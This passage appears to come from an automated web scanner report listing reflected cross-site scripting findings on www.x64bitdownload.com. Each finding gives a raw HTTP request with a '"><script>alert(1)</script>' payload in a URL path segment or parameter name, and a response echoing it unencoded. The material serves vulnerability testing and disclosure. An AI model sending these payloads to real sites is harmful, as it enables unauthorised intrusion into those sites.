HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:21:38 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21339
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloads39331"><script>alert(1)</script>831ea6de695/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9b2f"><script>alert(1)</script>30e728f96c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.htmld9b2f"><script>alert(1)</script>30e728f96c4 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:22:52 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56614
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.htmld9b2f"><script>alert(1)</script>30e728f96c4"/> ...[SNIP]...
1.282. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65876"><script>alert(1)</script>0527961b680 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html?65876"><script>alert(1)</script>0527961b680=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:18:52 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56620
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html?65876"><script>alert(1)</script>0527961b680=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85299"><script>alert(1)</script>d551f5477b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads85299"><script>alert(1)</script>d551f5477b5/t-64-bit-teamspeak-download-opmulwsy.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:22:42 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21326
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloads85299"><script>alert(1)</script>d551f5477b5/t-64-bit-teamspeak-download-opmulwsy.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75347"><script>alert(1)</script>3f02c20ef7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-teamspeak-download-opmulwsy.html75347"><script>alert(1)</script>3f02c20ef7c HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:23:45 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 59889
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-teamspeak-download-opmulwsy.html75347"><script>alert(1)</script>3f02c20ef7c"/> ...[SNIP]...
1.285. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ade4"><script>alert(1)</script>9b2e7ce64af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-teamspeak-download-opmulwsy.html?2ade4"><script>alert(1)</script>9b2e7ce64af=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:20:41 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 59895
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-teamspeak-download-opmulwsy.html?2ade4"><script>alert(1)</script>9b2e7ce64af=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15e9e"><script>alert(1)</script>2068dbf1796 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads15e9e"><script>alert(1)</script>2068dbf1796/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:20:35 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21340
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloads15e9e"><script>alert(1)</script>2068dbf1796/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e2d1"><script>alert(1)</script>b29de778e85 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html2e2d1"><script>alert(1)</script>b29de778e85 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:22:00 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 54158
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html2e2d1"><script>alert(1)</script>b29de778e85"/> ...[SNIP]...
1.288. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4317f"><script>alert(1)</script>f5492ba1d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html?4317f"><script>alert(1)</script>f5492ba1d6=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:17:45 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 54162
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html?4317f"><script>alert(1)</script>f5492ba1d6=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d5a5"><script>alert(1)</script>39fb5dff735 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads9d5a5"><script>alert(1)</script>39fb5dff735/t-64-bit-usenext-download-rizftkeg.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:18:56 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21324
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloads9d5a5"><script>alert(1)</script>39fb5dff735/t-64-bit-usenext-download-rizftkeg.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c06d"><script>alert(1)</script>7dbfa7985a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-usenext-download-rizftkeg.html4c06d"><script>alert(1)</script>7dbfa7985a0 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:19:38 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56287
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-usenext-download-rizftkeg.html4c06d"><script>alert(1)</script>7dbfa7985a0"/> ...[SNIP]...
1.291. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1902c"><script>alert(1)</script>78f4ba71bdf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-usenext-download-rizftkeg.html?1902c"><script>alert(1)</script>78f4ba71bdf=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:16:15 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-usenext-download-rizftkeg.html?1902c"><script>alert(1)</script>78f4ba71bdf=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f97a2"><script>alert(1)</script>fe238360768 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloadsf97a2"><script>alert(1)</script>fe238360768/t-64-bit-web-forum-reader-download-ivzgszuq.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:19:59 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21333
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloadsf97a2"><script>alert(1)</script>fe238360768/t-64-bit-web-forum-reader-download-ivzgszuq.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22641"><script>alert(1)</script>a78c23ad14d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html22641"><script>alert(1)</script>a78c23ad14d HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:20:50 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 54564
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html22641"><script>alert(1)</script>a78c23ad14d"/> ...[SNIP]...
1.294. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3401b"><script>alert(1)</script>d76e63f7bc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html?3401b"><script>alert(1)</script>d76e63f7bc9=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:17:00 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 54570
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html?3401b"><script>alert(1)</script>d76e63f7bc9=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9493"><script>alert(1)</script>26deef30248 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloadse9493"><script>alert(1)</script>26deef30248/t-64-bit-web-forum-reader-download-sqifmyiy.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:19:17 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21333
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloadse9493"><script>alert(1)</script>26deef30248/t-64-bit-web-forum-reader-download-sqifmyiy.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f12c"><script>alert(1)</script>5499298239f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html8f12c"><script>alert(1)</script>5499298239f HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:19:58 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 54563
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html8f12c"><script>alert(1)</script>5499298239f"/> ...[SNIP]...
1.297. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d77d"><script>alert(1)</script>3841192b652 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html?4d77d"><script>alert(1)</script>3841192b652=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:16:51 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 54569
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html?4d77d"><script>alert(1)</script>3841192b652=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3aef"><script>alert(1)</script>f4e866e47d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloadsa3aef"><script>alert(1)</script>f4e866e47d1/t-64-bit-windows-live-mail-download-melibvyx.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:22:14 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21334
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/downloadsa3aef"><script>alert(1)</script>f4e866e47d1/t-64-bit-windows-live-mail-download-melibvyx.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecd4d"><script>alert(1)</script>4b44f8919a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-windows-live-mail-download-melibvyx.htmlecd4d"><script>alert(1)</script>4b44f8919a7 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:23:19 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52868
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-mail-download-melibvyx.htmlecd4d"><script>alert(1)</script>4b44f8919a7"/> ...[SNIP]...
1.300. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3f31"><script>alert(1)</script>a68db57adbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /downloads/t-64-bit-windows-live-mail-download-melibvyx.html?b3f31"><script>alert(1)</script>a68db57adbf=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:18:12 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52874
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-mail-download-melibvyx.html?b3f31"><script>alert(1)</script>a68db57adbf=1"/> ...[SNIP]...
